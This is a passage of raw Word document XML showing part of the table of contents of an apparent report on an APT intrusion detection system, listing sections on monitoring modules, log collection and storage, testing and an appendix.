          <w:hyperlink w:anchor="_Toc485303747" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.2</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Service Monitor Module’s source code</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303747 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>74</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303748" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.3</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Log Module function</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303748 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>78</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303749" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1.4</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Sentry Forensic Source code</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303749 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>84</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303750" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2</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Distributed Log Collector Hardware and Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303750 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303751" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.1</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Distributed Log Collector Hardware</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303751 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303752" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2.2</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Centralized Log Storage System</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303752 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>88</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303753" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3</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APTIDS Testing</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303753 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303754" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.1</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Manual testing</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303754 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303755" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3.2</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Real case Monitoring</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303755 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>99</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303756" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 5.</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CONCLUSION</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303756 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303757" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Chapter 6.</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APPENDIX</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303757 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303758" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1</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Setting up testing environment</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303758 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00B94D16" w:rsidRDefault="00DE075B">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:color w:val="auto"/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc485303759" w:history="1">
            <w:r w:rsidR="00B94D16" w:rsidRPr="00AA76F1">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2</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Bibliography</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc485303759 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>103</w:t>
            </w:r>
            <w:r w:rsidR="00B94D16">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="000C0B89" w:rsidRDefault="000C0B89">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="008F0F14">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRPr="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB2F32">
        <w:rPr>
          <w:b/>
        </w:rPr>
